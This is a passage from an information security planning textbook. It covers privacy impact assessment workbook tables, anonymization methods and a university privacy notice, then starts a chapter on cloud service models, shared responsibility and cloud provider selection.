Processing of data: How will you collect, use, store and delete data and how will your organization process the data? What is the source of the data? Will you be sharing data with anyone? It is helpful to include a flow diagram of some sort. What data processing may be high risk?

Scope of processing: what is the nature of the data, and which special categories of people or PII does this affect? How many individuals are affected? What data items will you be collecting and using? How often? How long will you retain data? What geographical area does it cover?

Context of processing: what relationship do you have with the individuals? How much control will they have? What is your agreement with the individuals as to how they can access or control their data? What security or privacy issues have you encountered previously? What issues might be of public concern today? What controls do you implement, and how do they relate to current technology? Are you following any approved code of conduct or certification scheme? Consultation with stakeholders: How and when will you seek data subjects’ and others’ views – or justify why it’s not appropriate to do so. Who is involved within your organization – including security or other experts?

Financial Sponsorship Form According to U.S. regulation, international students must demonstrate sufficient funds before being issued a Visa to study in the U.S. This ensures that they can complete their degree, after it has been started. The university benefits by having a qualified and diverse student body. The data is collected after a student is admitted, and before a Visa is issued. The information is obtained via an encrypted webpage, after login with two-factor authentication. After the first week of school, the pdf is archived offline and is no longer available anywhere online. This data is high risk because it provides financial information, including name, bank, account total, and often account number. If the account is breached, social engineering or other hacking techniques may result in a significant family savings (or debt) being stolen. The number of individuals affected are the number of international students attending the university. The nature of the data is confidential financial information, but does not include any special category of people (e.g., children, convicts). The data is retained for 5 years in archived, offline form, in case of government review. Prospective students send us financial information, required by the U.S. government. Students may update this information, but rarely do. Of greatest concern is that this information is transmitted and stored in encrypted ways, and is maintained online for as short a period as possible. The records are compressed and stored in an encrypted way the second week of fall and spring semesters. Only the International Student Services organization accesses this information. Local and statewide security personnel to made this implementation possible. Since the U.S. requires this information, it is required processing. Students are aware and participate. (continued)

10.3  Step 2: Performing a Privacy Impact Assessment

193

Table 10.3 (continued) Information type Privacy principles: How will privacy principles be addressed? If you address specific regulation, how are specific articles met? How will you prevent function creep and update and maintain policy implementation?

Financial Sponsorship Form The following principles are applied:   Purpose limitation: Data is collected and used only for its explicitly defined intention.   Data minimization: Only the minimum, necessary data is collected and used to fulfill the defined (or legally authorized) purpose.   Storage limitation: Data is not be retained for longer than necessary, although archive is used for government audit purposes.

Table 10.4  Risk analysis component of PIA (workbook exercise)

Source of risk and impact on individuals Financial Sponsorship Form contains confidential financial information of a large amount of money. A breach can result in identity fraud. Threat to student(s) in loss of finances; potential of not completing the degree program, not finding the resulting higher-paying job; still must pay back loans or parents; parents lost retirement savings in same account. Threat to university in resulting lawsuit. Grades: Breach, stigmatization and induced disclosure if grades are exposed. Potential of public discussion of grades, including permanent online exposure. Threat to university includes ransom demand and federal review of policies. Exception to Full-Time Status Form: Stigmatization if student is not full time because of lack of qualification; no choice of study partners.

Severity (minimal, significant or severe) Severe to individual

Likelihood (remote, possible or probable) Possible or eventually probable

Significant to individual; severe to university

Eventually probable

Possible Minimal to individual and university

Overall risk (low, medium or high) High

High

Low

10.3.1 Defining Controls Table 10.5, designed from a part of E.U.  GDPR’s DPIA template [8], considers controls for the Einstein university data, as documented in previous tables. Controls should be considered through the entire data life cycle, including planning (inventory, classification, minimization), data analytics, data migration, data storage, data warehousing, data retention and archiving, and data destruction [4]. Types of controls considered for data privacy include [4]:

10  Attending to Information Privacy

194

Table 10.5  Controls to reduce privacy risk (workbook exercise)

Risk Financial Sponsorship Form: Breach -> Identity Fraud Grades: Inaccurate grade due to instructor error. Exception to Full-Time Status:

Effect on risk (eliminated, Optional controls to reduce reduced accepted) or eliminate risk Reduced Encrypted transmission and storage of data. Early offline archival of financial information. Data retention is 5 years. Policy to enable student to Reduced petition to Instructor, then Dean of Students.

Encrypted storage of data. Early offline archival of forms. Data retention is 5 years. Grades: Reporting Analysis occurs with statistical averages over for analytic courses, or major or other purpose means without exposing student names.

Residual risk (low-­ medium-­ high) Low

Measure approved (yes/no) Yes

Low

Already implemented

Reduced

Low

Yes: Responsibility: IT

Reduced

Low

Yes: Responsibility: Metrics office

• Encryption and hashing of data in transmission and storage. Encryption protects packets in transmission or when a memory or archive is stolen or lost. This also includes remote controls of public key infrastructure and certificates. These topics are discussed in the Network Security chapter. • Authentication and access control: Access control techniques are discussed in the Information Security chapter. • Logging and Alarms: Logging of application transactions, system, network and application configuration changes, and other privacy and security events are discussed in the Incident Response chapter. • Deleted data. This includes secure wipe, degaussing, destruction, and crypt-­ shedding. These controls are discussed in the Information Security chapter. • Privacy by Design: Integration of privacy into the entire software development process, preventing privacy from being added at the end of the process [4]. • Anonymizing Data: When people obtain access to data (whether authorized or not) through a database, even encrypted data will be visible. Thus, it is helpful to not store personally identifiable information in that database. That is our next topic.

10.3.2 Anonymizing Data One way to hide details in the data is to anonymize it, using data obfuscation. A limited data set excludes all identifying information or ‘blocklisting’ data fields such as name and address, which prevents their disclosure, and enabling access or

10.4 Step 3: Developing a Policy and Notice of Privacy Practices

195

‘allowlisting’ other data fields, for which disclosure is permitted. One may classify certain fields like zip code or age into categories. Data can be randomized using a Gaussian statistical distribution, so that any particular value is not accurate, but that statistical means and variances are generally accurate [12]. Data obfuscation is a way to balance data provider’s risk, while providing the client permissible data quality  – but the means of anonymizing the data must be done very carefully to ensure privacy. The main purpose of data obfuscation is to reduce the associability of PII to individuals. This process of disassociability hides any association to individuals during the processing of PII. Disassociability can be achieved using de-­identification or data anonymization, which is the removal of PII in an irreversible way. Specific methods to de-identify PII include [4]: • Pseudonymization: hides PII by replacing identifiers, such as names, phone numbers or social security numbers, by deleting or replacing these identifiers with temporary IDs, such as alternative numbers or names. –– Tokenization: Replaces actual data with randomly generated numbers –– Re-identification: enables the regeneration of the original data using a second file to translate the temporary ID with the missing identification. This second file is maintained separately to reduce the probability of breach and is only accessible to a privileged few. • K-anonymization: anonymize attributes that may point indirectly to an identity. For example, if there are fewer than K (threshold) people living in a particular city or zip code, combine cities or zip codes with a new ID, until there are at least K people in that group. Thus, it may replace some values with range data, while other values remain unchanged. At the hardware level, data scramblers may be used to obfuscate data, to hide main memory contents and transmission packets. In addition to hiding data contents, it improves hardware signal integrity, by avoiding long strings of zeros or ones and also reduce power supply noise. The scrambling algorithm can vary in security effectiveness from using simpler exclusive-OR operations modified by secret key and data address values, to using secure encryption techniques [10].

10.4 Step 3: Developing a Policy and Notice of Privacy Practices A signed-off PIA means that the data inventory is completed, the primary purposes of data processing has been defined, and risks are known and prioritized. Next comes the job of building transparency and trustworthiness via a clear communication with data subjects, indicating how their information will be used, and possibly, how they can access and petition to amend their data. Two documents commonly adopted for communicating information privacy policy to data subjects include [4]:

196

10  Attending to Information Privacy

Notice of Privacy Practices (NPP): This is a record to the outside world describing how the controller obtains and uses data. Data subjects and government authorities are the indented audience. Consent Form: After reading the NPP, the data subject is expected to sign a consent form, indicating that the data subject is aware of how their personal information will be used. In addition, internal employees must also be aware of how privacy will be implemented in the organization, through policy documentation and training. Privacy Policies are internal documents used to communicate rules to employees describing how personal information is to be handled. They are followed up with procedures, standards and guidelines, as described in the Governance chapter. Policies should address the lifecycle of information, including how personal information will be collected, used, retained, secured, and disclosed. Although the intended audiences are different, both the NPP and internal privacy policies need to answer the following questions. • • • • • •

What data is collected? How is personal data used? To whom is data shared? How long is data retained? What rights do data subjects have to inspect or change their records? How is the NPP shared with data subjects? Is a consent form required, and if so, how is it obtained?

A good start for this information must be collected from regulation(s) your organization must adhere to and what a lawyer recommends. It may be useful to learn from other examples, including other NPPs that are recommended or exist on the web. Also discuss what might work with different roles in your organization. How do they use the information? Finally, also factor in what privileges your data subjects might prefer. The next step is to consider how to communicate your NPP, including posting the NPP on your website, office walls, contracts, and/or customer forms (Table 10.6).

10.5 Advanced: Big Data: Data Warehouses Information is worth money, since it is often sold or harnessed to optimize decisions. This has led to data analytics on large databases. While this may lead to good things: (e.g.,) medical discoveries, weather analysis, and increased profits, but it can also lead to data breaches and identity theft. Two approaches to planning data warehouses include collecting it all and sorting later, or deciding what problem you want to solve and then aggregating that. The second method is superior to the first because it considers the business need for the

10.5 Advanced: Big Data: Data Warehouses

197

Table 10.6  Einstein University’s notice of privacy practice (workbook exercise) Einstein University – notice of privacy practice What data is Einstein university retains student contact information, course registrations, collected? grades, employment records, and news-oriented stories related to sports, arts, extracurricular, academic and other activities. To whom is Grade transcripts are shared with external parties only with the data subject’s data shared? explicit permission. However, FERPA provides exceptions when a school official has a “legitimate educational interest” if the official needs to review an education record in order to fulfill his or her professional responsibility. These may include:   Requests from “school officials” generally includes university parties such as: instructors; administrators, health, and clerical staff; counselors; attorneys; and members of educational or disciplinary committees.   Requests in connection with an emergency, if such information is necessary to protect the health or safety of you or another person.   Requests in accordance with a lawful subpoena or court order.   Requests for public records information. Shared student contact information includes only name and email address on university website search information. University news stories and websites may discuss sports activities including descriptions of athletes; student leadership and participation in arts, clubs, and extra-curricular activities; student graduation, academic awards, and may include academic year of study or planned graduation. How long is Scholastic transcripts are retained infinitely, so transcripts may be available at data retained? any future date. Contact information is removed after graduation or after one semester of non-attendance. What rights do Family Educational Rights and Privacy Act (FERPA) of 1974 affords eligible students have? students certain rights with respect to their own educational records. These rights include:   1. The right to inspect and review their own educational records within 45 days of the date that Einstein University receives a request for access;   2. The right to request an amendment of their educational records that the student believes to be inaccurate, misleading or otherwise in violation of their privacy rights under FERPA;   3. The right to provide written consent to allow disclosure of those records, subject to exceptions;   4. The right to opt out of making directory information available without consent (FERPA Hold)   5. Annual notification of privacy practices for students (under FERPA for post-secondary institutions.) How can Requests to review your records must be made in writing and presented to the students appropriate office. That office will have up to 45 days to honor your request. inspect and For most students these offices will include registrar’s office/student records, change their college dean, academic department, financial aid, dean of students or records? residence life. You may request to have records corrected that you believe to be inaccurate, misleading or in violation of your privacy rights. Requests to change and to challenge the information deemed erroneous or misleading should be made in writing and directed to the chair, dean or director of the appropriate office so that a hearing can be scheduled. How will the The NPP is available on a public website and is emailed to students annually. NPP be made available to data subjects?

198

10  Attending to Information Privacy

data. Carefully evaluating the actual needs of data analysis may ensure that minimum data is actually retained in a data warehouse. Once the Big Database is built, security for big data should minimally include [17]: • Encryption: Stored and transmitted data should both be strongly encrypted. A vault securely manages certificates and keys. • Authentication and Access Control: Finely grained access control supports permissions at the field and record level. • Firewall: Restricted access to only certain types of messages, potentially from certain locations. • Security Intelligence: Tool provides alarms regarding potential intrusions. Advanced tools might have a real-time security status display, similar to a SIEM. A simple approach is to aggregate the data into one collection, then protect that extremely securely. A complex but possible more secure approach fragments data in a distributed way, so that no one location provides any meaningful information. An example implementation is the RAID-type configuration, where a record could be distributed over four databases [13]. Alternatively, data can be divided up logically across databases, so that (for example) contact information, credit card number/ expiration, and CVV are retained in three different databases [14]. This is effective in independent attacks, but not if an attacker manages to penetrate an account. HIPAA allows for data aggregation, which combines information from multiple health providers [15]. Note that aggregating smaller datasets into one large dataset helps to anonymize individual records. A limited data set excludes all identifying information, such as name, address, contact information, health plan/account numbers, certification/license numbers, vehicle information, device/serial identifiers, internet (IP/URL) information, biometric and facial images. The advantage of this technique is that even if an account is penetrated, data is obfuscated.

10.6 Questions 1. Vocabulary. Match each meaning with the correct word. Controller Policy Disassociability Re-identification

Consent form Data subject Purpose limitation Storage limitation

Notice of privacy practices Data minimization k-anonymization Privacy by design

(a) An entity for whom data is collected by the organization. (b) An organization that collects data on entities. (c) A means of communicating privacy rights to clients. (d) A means of enforcing acknowledgement of the NPP from clients. (e) Data is retained for the minimum time possible

References

199

(f) Only the minimum and necessary data is collected to achieve the intended purpose (g) Information is only used for the explicit, documented intention(s). (h) The general goal of hiding any association to individuals during the processing of PII. (i) A second file is used to translate random keys into real identities, enabling the original records to be re-created. (j) Identifying characteristics, such as home city or region, are renamed to ensure a threshold minimum level of people fall into each category. (k) In software development, privacy is built into each stage of the project development. 2. Notice of Privacy Practices: Contrasting Examples. Look up 3 notice of privacy practices online from a selected industry (e.g., healthcare) or across industries. What questions are asked and answered? Evaluate the NPP for what is helpful and not helpful. 3. Notice of Privacy Practices: Legal Issues. Read the regulation associated with a selected industry or nation. What practices are required for you to provide related to that regulation? 4. Case Study: Complete Tables 10.1, 10.2, 10.3, 10.4, and 10.5 for your planned organization, potentially completing information requirements for a department.

References 1. Kelleher D (2014) If it’s free, you’re probably the product. TechTalk (blog), GFI Software, https://techtalk.gfi.com/if-­its-­free-­youre-­probably-­the-­product/ 2. Hill K (2012) How target figured out a teen girl was pregnant before her father did. Forbes, Feb 16. https://www.forbes.com/sites/kashmirhill/2012/02/16/ how-­target-­figured-­out-­a-­teen-­girl-­was-­pregnant-­before-­her-­father-­did 3. Davis J (2023) Feds blast ‘shadow’ operations of data brokers, revive calls for federal privacy law. SC Magazine 20 Apr 2023, from https://www.scmagazine.com/news/privacy/ feds-­blast-­shadow-­operations-­data-­brokers-­federal-­privacy-­law 4. ISACA (2020) CDPSE™ review manual. ISACA, Schaumberg 5. Brooks S, Garcia M, Lefkovitz N, Lightman S, Nadeau E (2017) NISTIR 8062: an introduction to privacy engineering and risk management in federal systems, January 2017, National Institute of Standards and Technology, U.S. Department of Commerce. Reference: https://doi. org/10.6028/NIST.IR.8062 6. IEEE (2022) IEEE standard for data privacy process (IEEE Std 7002™-2022), Software and Systems Engineering Standards Committee, IEEE Computer Society, 9 Feb 2022 7. FPC (2022) Fair information practice principles, Federal Privacy Council, U.S. Government. From: https://www.fpc.gov/resources/fipps. Accessed 20 Jan 2023 8. Wolford B (ed) (2022) Data Protection Impact Assessment (DPIA): how to conduct a Data Protection Impact Assessment (template included). Proton Technologies AG. https://gdpr.eu/ data-­protection-­impact-­assessment-­template/ (Accessed 23 July 2022) and https://gdpr.eu/wp-­ content/uploads/2019/03/dpia-­template-­v1.pdf 9. European Union (2018) General Data Protection Regulation (GDPR) https://gdpr-­info.eu

200

10  Attending to Information Privacy

10. Yitbarek SF, Aga MT, Reetuparna Das R, Austin T (2017) Cold boot attacks are still hot: security analysis of memory scramblers in modern processors. 2017 IEEE international symposium on high performance computer architecture, IEEE, pp. 313–324 11. Bisdikian C, Sensoy M, Norman TJ, Srivastava MB (2012) Trust and obfuscation principles for quality of information in emerging pervasive environments. In: The 4th international workshop on information quality. Institute for Electrical and Electronics Engineers (IEEE), http:// ieeexplore.ieee.org, pp 44–49 12. Chakraborty S, Raghavan KR, Srivastava MB, Bisdikian C, Kaplan LM (2012) Balancing value and risk in information sharing through obfuscation. In: 2012 15th international conference on information fusion (FUSION). IEEE, pp 1615–1622 13. Dev H, Sen T, Basak M, Ali ME (2012) Approach to protect the privacy of cloud data from data mining based attacks. In: 2012 SC companion: high performance computing, networking, storage and analysis. SC Magazine, pp 1106–1115 14. Subashini S, Kavitha V (2011) A metadata based storage model for securing data in cloud environment. In: 2011 international conference on cyber-enabled distributed computing and knowledge discovery. IEEE, pp 429–434 15. HHS (2013) HIPAA administrative simplification regulation text. U.S. Department of Health and Human Services Office for Civil Rights. Mar 2013, pp 59–115 16. Hilliard E (2021) The GDPR: a retrospective and prospective look at the first two years. Berkeley Technology Law Review 35(1245):1245–1289 17. Vora MN (2011) Hadoop–HBase for large-scale data. In: International conference on computer science and network technology (ICCSNT), vol 1. IEEE, pp. 601–605. http://ieeexplore. ieee.org

Chapter 11

Planning for Alternative Networks: Cloud Security and Zero Trust

I would strongly recommend against anyone trusting their private data to a company with physical ties to the United States. – Ladar Levison, President of Lavabit, fought off court orders, then closed his company after being sued to reveal his company’s private key. [12]

The vast majority of organizations use one or more cloud systems [4] and many may implement much of their IT systems on a cloud system, passing control of security to another entity. Cloud systems may be low cost due to increased shared efficiencies [9]. Figure 11.1 shows, end user terminals and computers interface with the Internet, and a cloud service provider provides the computing resources. A form of advanced network, zero trust, is discussed in the second part of this chapter.

11.1 Important Concepts A main advantage of cloud services is resource pooling; customers pay the cloud provider for IT services, and gain broad network access and on-demand, elastic service. These features ensure that you get and pay for the service you actually use, when you want it. The Cloud Security Alliance [6] describes the features of cloud as offering “agility, resiliency and economy”. Economy is achieved through shared infrastructure, resource pooling, and pay-as-you-go measured service. Agility is achieved through rapid elasticity, since cloud services can be automatically configured, deployed, expanded or contracted, and managed [6, 11]. Resiliency is achieved via automatically managed backups and redundancy on multiple computers in different locations [7]. Particularly for small businesses, a major benefit is that the management and infrastructure of the cloud is managed by the cloud provider. Thus, for organizations without technical or security savvy, such offerings promise to remove the complexity and IT problems from management’s concern. However, to properly establish such an implementation, customers should be aware of the features and contractual

© The Author(s), under exclusive license to Springer Nature Switzerland AG 2024 S. Lincke, Information Security Planning, https://doi.org/10.1007/978-3-031-43118-0_11

201

202

11  Planning for Alternative Networks: Cloud Security and Zero Trust

Fig. 11.1  Cloud computing

issues that impact them as well as realizing that it takes considerable security skill to properly configure the cloud. There are two issues that cloud users should be aware of. Cloud planning requires decisions and negotiating through the issues and legal complexities of a cloud implementation, including shared responsibility, service level agreements, data privacy and retention policies. Secondly, cloud is not a security panacea: an international 2021 SANS report [15] found 16% of organizations experienced a breach in the cloud environment, and in 20% of cases, attackers traverse from cloud to internal network attacks. Therefore, it is important to seriously address security in the cloud environment. The Shared Responsibility Model is the idea that both cloud provider and cloud users are responsible for aspects of security, depending on the cloud service model. The cloud provider provides security for the bottom portion that it configures and manages, whereas the cloud user is responsible for the user portion that it defines and manages. Regardless of whose fault it is, all cloud users are 100% responsible in the end for their security. The Cloud Security Alliance [6] recommends that cloud providers clearly define the security features and controls they implement. Then cloud users should complete a security matrix that apportions the security controls provided by the cloud provider, and the controls they must furnish. The Cloud Security Alliance provides a baseline Cloud Controls Matrix (free of charge) to help in this process.

11.1.1 Cloud Deployment Models Different cloud service models are shown in Fig. 11.2 and include [4, 6, 10, 11]:

11.1  Important Concepts

203

Fig. 11.2  Cloud services

Infrastructure as a Service (IaaS)  Cloud provides customers access to processing, storage, networks or other fundamental resources, but customer provides the applications and possibly operating system. The cloud provider enables an organization to quickly establish a virtual machine to host their desired operating system with software. The VM is configured from a website within minutes. The cloud user is responsible for most security, including everything built on top of the infrastructure, whereas the cloud provider is primarily responsible for network security, including firewall rules. Platform as a Service (PaaS)  Consumer provides application software; cloud provider generally provides system and software development environment (e.g., web development toolkit). This format is variable in configuration, generally built above an IaaS. It generally offers a VM with a database management system or other software platform offering an Applications Programming Interface (API), that can then be programmed by the user. The cloud provider is responsible for patching and hardening the platform, whereas the cloud user is responsible for everything built on that platform, including any software development, application configuration, deployment, log monitoring, authentication, access control, and patching of customer-­installed applications. Container as a Service (CaaS)  One PaaS implementation is the Container service, where users develop a container image, or a code execution environment, for deployment. Containers may be run directly on an operating system or within a virtual machine.  Unlike virtual machines which run their own operating system, containers run on top of an operating system. Container service examples include: Google’s Kubernetes Engine (GKE), Amazon’s Elastic Container Service (ECS), Azure’s Kubernetes Service (AKS), and Red Hat’s OpenShift. Programming tools to automatically configure containers include Kubernetes, Docker and Open Shift. Programmed configurations can enforce egress firewall rules, network logging, vulnerability testing via container image scanning, default container login, and incident/event notification methods. Thus, they reduce errors in deployment and ensure a consistent policy and hardening implementation.

204

11  Planning for Alternative Networks: Cloud Security and Zero Trust

Storage as a Service (StaaS)  Data storage can be allocated as a service. Data shows up as simply another folder on a computer, which is accessed through a web interface. Examples include Google Drive, Microsoft One Drive, Apple iCloud, and Dropbox. The cloud provider is responsible for configuration and patching, whereas the cloud user is responsible for user permissions and the selected security database features. Data as a Service (DaaS)  Cloud provider provides data, normally via a database, for client access. Software as a Service (SaaS)  Cloud provider runs their own applications on cloud infrastructure; this is often synonymous with Database as a Service. This cloud service is often used to share documents among a team. Changes are shared instantly among users. Instead of having documents stored locally on a computer, these shared documents are accessed via an encrypted web interface. The cloud provider is responsible for most security in this configuration, except for the portion that the cloud user manages: authorization and permissions. Disaster Recovery as a Service (DRaaS)  The cloud does not assume redundancy. When the contract is specially written, cloud services can easily provide failover type redundancy, automatically, for hosted services. This DRaaS cloud service basically provides a hot-site backup service for services hosted at the customer site, potentially bringing up a site in 0–60 min. Different versions of this service may include [2]: • Backup and Restore: Backup data is sent continuously to the DRaasS, but no software is operational on the cloud (except for disaster recovery testing) • Warm Backup or Pilot Light: Backup data is sent continuously and the program is loaded but zero to minimal transactions are run on the cloud. Security-related cloud features include [2]: • Failover: If one site goes down, a backup system takes over. • Load Balancing: If traffic is distributed proportionally over multiple servers to improve response time and as a means of failover. Cloud services can also be categorized by their customer type [6]. Public clouds are multitenant: they serve any and all customers. There is usually less contractual flexibility in this model, since they generalize services for all. However, they benefit from economy of scale. Community clouds specialize in a particular business, such as medical and financial. These clouds specialize in particular software, compliance and security services for that industry. Community consensus helps to define services and policy decisions. Private clouds serve individual customers, and can be owned or leased in a third-party agreement. Contracts are negotiated here, but all required services must be documented in the contract.

11.3  Step 1: Define Security and Compliance Requirements

205

Regardless of how the cloud is used, service level agreements (SLAs) define contractual capabilities, such as backup, security, and availability requirements. (SLAs are discussed in Personnel Security.) Some clouds specialize in specific industries, such as health, and adhere to industry security regulations. Without such an agreement, no assumptions about service should be made.

11.2 Planning a Secure Cloud Design The process of deploying a cloud implementation includes [6]: 1 . Define security and compliance requirements 2. Select a cloud provider and service/deployment model 3. Define the architecture 4. Assess security controls 5. Identify gaps in control 6. Address and implement missing security controls 7. Monitor and manage changes We will review the planning aspects of these stages next, combining steps 4–6 into one ‘Assess and Implement Security Controls’ stage.

11.3 Step 1: Define Security and Compliance Requirements In a normal, internal network, security concerns relate to confidentiality, integrity, and availability, and the main attackers of concern include external attackers, rogue employees, and issues related to application attacks, hardware faults, natural or manmade disasters. In the cloud, additional concerns are privacy and lack of control. Privacy issues refers to the retrieving of personal information for reasons of curiosity or even greediness (selling of information). Privacy concerns can relate to cloud providers’ or cloud auditors’ access of users’ identity, preferences, and habits [16]. Privacy also would ensure data protection from other cloud customers. See Fig.  11.3 for a simple misuse diagram, demonstrating threats, related to cloud. Table 11.1 shows security and privacy considerations related to the university learning management system (or database of student coursework). In addition to privacy issues, reduced control is also a concern. One new dependency is network availability [9]. For local office server usage, it is important to determine the reliability of network services and consider a backup service. Secondly, the cloud controls the configuration of their services, so it is possible for rarely accessed data to be removed to improve cloud profitability [16]. A third issue is in failures of the cloud interface. SANS [15] reports that in configuring cloud services, misconfigurations are common, and that clouds sometimes have vulnerabilities in software or API interfaces. Finally, in the case of Shadow IT, the IT

206

11  Planning for Alternative Networks: Cloud Security and Zero Trust

Attack application External attacker

Fail equipment

Fail network Nature/disaster Misconfiguration

Reduce control/privacy

Rogue employee Use unauthorized app

Reduce priority Cloud employee/auditor

Shadow IT

Fig. 11.3  Threats to cloud security Table 11.1  Threats to learning management system: security and privacy (workbook exercise) Confidentiality: Security issue: Grades are released resulting in FERPA investigation. Security issue: Assignments are unknowingly copied from 1 student to another. Security issue: Cloud employee sells or gives answers to students. Privacy issue: Copied files from top student is thought to be cheating; student earns a zero. Integrity: Security issue: Submitted assignments are mixed up, lost or deleted by system failure, attacker or rogue employee. Security issue: Ransomware deletes all homework; ransom is too high to pay; no grades are available for courses for semester. Privacy issue: Students whose work is lost suffer undeserved bad grades. Availability: Security issue: Assignments are due but students can’t access the system to submit. This is particularly problematic during homework and exam submission deadlines. Privacy issue: Students worried about not submitting on time; late grade assigned results in course failure. Regulation: FERPA (family education rights and privacy act): School grades are protected. State breach notification: Student identifiers must be protected. Social security numbers and financial records are not maintained in this database.

department may not even be aware that members of the organization are using unapproved apps in the cloud, finding them easier to work with than approved apps. To counter this relinquishing of control, verification of security is important to provide. Third party auditors can verify security services for public or other shared cloud services. However, monitoring of cloud  usage metrics is useful, using network flow data and network access control monitoring [15]. To properly monitor usage metrics requires a good baseline set of statistics and monitoring for false positives.

11.4  Step 2: Select a Cloud Provider and Service/Deployment Model

207

Full data privacy on a public cloud can be implemented by keeping data fully encrypted, even during processing. Such encryption of data in the cloud protects data privacy, but restricts data usability, including searching. New searchable encryption algorithms enable searching of encrypted data. Basic search algorithms often rely on encrypting search words, which are compared to encrypted indexing, but many sophisticated algorithms exist [16]. Homomorphic encryption allows data to be manipulated and computational algorithms performed on encrypted data. Algorithms also exist to support encrypted integrity, access control, etc.

11.4 Step 2: Select a Cloud Provider and Service/ Deployment Model There are two sources of information about security controls provided by the cloud provider: the Service Level Agreement and documentation about the cloud’s web services [6]. One of the first steps in selecting a cloud provider is to obtain their documentation, describing their services, including security features. A Service Level Agreement (SLA) is the all-important contract between the cloud provider and client. Security issues a client should carefully consider related to cloud include [1, 3, 5, 10, 15]: Regulatory issues • What do my nation’s laws require in protecting my data? What international laws, data privacy laws and state breach laws are my data subject to? • Where (e.g., which country) will my client data reside, and what government intrusion, security and privacy laws might my data be subject to? What is cloud provider policy if law enforcement subpoenas a client’s sensitive information? • What cloud controls are in place to address these regulations? How will breaches be notified and handled? (Ultimately the cloud customer is responsible for security) • What are cloud provider privacy policies related to client data? What security controls and monitoring are provided for the client? Cloud Provider Security Implementation • What controls are implemented by the cloud provider for confidentiality, integrity and availability, or more specifically, authentication, access control, digital certificate exchange, IDS, trusted platform? What network security controls exist? • What policies and security implementations prevent cloud personnel from accessing and leaking client data? • What third-party audit processes exist? What does the audit involve and how are results disseminated? How often are audit/compliance results provided? What have previous audit results shown?

208

11  Planning for Alternative Networks: Cloud Security and Zero Trust

• Does the cloud provider maintain and publish metrics on availability (or downtime)? • What cloud tools are available for testing and monitoring of security? What protocol and restrictions exist for the cloud user to perform vulnerability and penetration testing? • What types of alarm/logs does the cloud provider monitor for? Are client-system logs available to clients? • Can clients monitor the usage and access of their data? Cloud Incident and Disaster Recovery • What rates of availability does the cloud provider maintain? Can data be maintained redundantly in multiple regions? How is data synchronization achieved? Can the organization’s recovery point objectives and recovery time objectives be achieved? • What are the cloud server provider policies for disaster recovery? How does the cloud provider handle disaster recovery? What is included in the contractual agreements? • How is incident response handled by the cloud provider? What tools are available to clients to forensically analyze incidents? Contractual Issues – Cloud Provider and Third Party • What is the cloud provider standard Service Level Agreement? Can this SLA be personalized for specific needs? • If we are under contract to another organization, does the proposed cloud implementation meet our contracts’ requirements? What issues does our contract specify or imply? • What happens at contract termination? What are the cloud provider’s data privacy policies? How does data export to another system work, what is this cost, and what are cloud provider policies for data destruction? Cloud Programmability • What security APIs or form interfaces are supported to automatically configure a security configuration? Does the cloud provider support the API required by the client? What kind of scripting and key management options does the cloud provider provide? Cloud Provider Reputation • Is the cloud provider reputable, financially stable, protected by insurance, located primarily (or entirely) in the home country? What recent legal cases have involved the cloud provider? (casetext.com can provide details.) The ability to negotiate the Service Level Agreement may depend on the size of the cloud provider and the public vs private deployment model used [6]. Small and private providers may provide more flexibility to vary the SLA, while larger providers may provide more capabilities.

11.6  Step 4–6: Assess and Implement Security Controls in the Cloud

209

After defining the requirements for the cloud services, it is helpful to define Service Level Objectives (SLO) which are basically metrics to measure the cloud provider’s performance against desired goals.

11.5 Step 3: Define the Architecture Architectures are generally layered, consisting of the following layers: Software as a Service: Contains the presentation layer software (e.g., web interface to the user), application programming interface to a multitenant application with local data; Platform as a Service: Consisting of integration and middleware software, including base software such as an OS with database; Infrastructure as a Service: Consists of the virtual machine abstraction, hardware, networking and storage facilities. Virtualization: The cloud depends on virtualization to separate services and tenants. The cloud provider is responsible for minimally securing the hardware and hypervisor, but the customer is responsible for securing security controls within the virtual environment. Multicloud system: if multiple cloud services are used, this may result in potential interface issues.

11.6 Step 4–6: Assess and Implement Security Controls in the Cloud It is important to remember with the Shared Responsibility Model that both cloud provider and cloud users are responsible for aspects of security: the cloud provider provides security for what it configures and manages, whereas the cloud user is responsible for the portion that it defines and manages. Another way of saying this is that the cloud user selects, orders and pays for security, whereas cloud providers implement what cloud users configure and pay for. Cloud users should complete a security matrix that apportions the security controls provided by the cloud provider, and the additional controls they need to configure and manage. The Cloud Security Alliance [6] provides a Cloud Controls Matrix that can be downloaded for use. Also consider that moving data from within a company Intranet to the cloud/Internet raises the accessibility of the data worldwide: what functions and actions should be available from which locations? Figure 11.4 provides a diagram of the Shared Responsibility Model, where the lower darker reddish components are primarily the responsibility of the cloud (according to contract options) and the upper, lighter blue components are primarily the responsibility of the customer (It is slightly simplified from [18]).

210

11  Planning for Alternative Networks: Cloud Security and Zero Trust

Fig. 11.4  Shared responsibility model: IaaS versus SaaS

Popular security controls cloud users use in order of popularity (60.7–44.5%) include web application firewalls, network access controls, NIDS, VPNs, network antimalware, network traffic analysis and data loss prevention software [15]. These tools were only getting more popular, as many not using specific controls were planning to implement them in the next year. Cloud Security Alliance [6] highly recommends multifactor authentication for all services in the cloud. When software is developed in-house, the following tools are useful before software deployment [4]: • static analysis: scans code automatically looking for programming vulnerabilities and bugs. • container image scanning: Static scanning of container can check configuration issues and known vulnerabilities; • automated testing: includes regression testing and fuzzing before release • other software development techniques: risk analysis, code reviews, etc., covered in later chapters. After software deployment: • runtime application self-protection: monitors an application to notify of unusual system uses or violations of policy. • web application firewalls: tracks user accesses to the application and validates some input; allowlisting can be helpful. • vulnerability scanning and penetration testing: testing the run-time environment after deployment • network detection and response (NDR) and network traffic analysis (NTA): monitor for unusual network traffic patterns, preferably via machine learning; • host intrusion detection systems: track changes to system, files and configuration to adhere to policy.

11.7  Step 7: Monitor and Manage Changes in the Cloud

211

At a more detailed level, cloud security services/features may include a Secure Access Service Edge (SASE) architecture, that includes the following components [17]: Cloud-access security broker (CASB): Controls and monitors traffic between an organization’s users and the cloud services, and may perform access control functions. Secure web gateway (SWG): analyzes and logs inbound web accesses and filters malware and attacks. Firewall-as-a-service (FWaaS): enables the cloud customer to custom configure the firewall to protect their cloud services. Zero Trust Network: An emerging technology enabling transactional verification; see second part of this chapter for more details. Currently, AWS’ default configuration policy is to restrict all access through the network firewall to new customer applications. The customer must configure their firewall to enable any traffic through. This enables customers to securely configure their cloud system without threat of attack, but also allocates the burden of the firewall configuration to the customer. With blanket defaults, it is very easy for the customer to misconfigure.

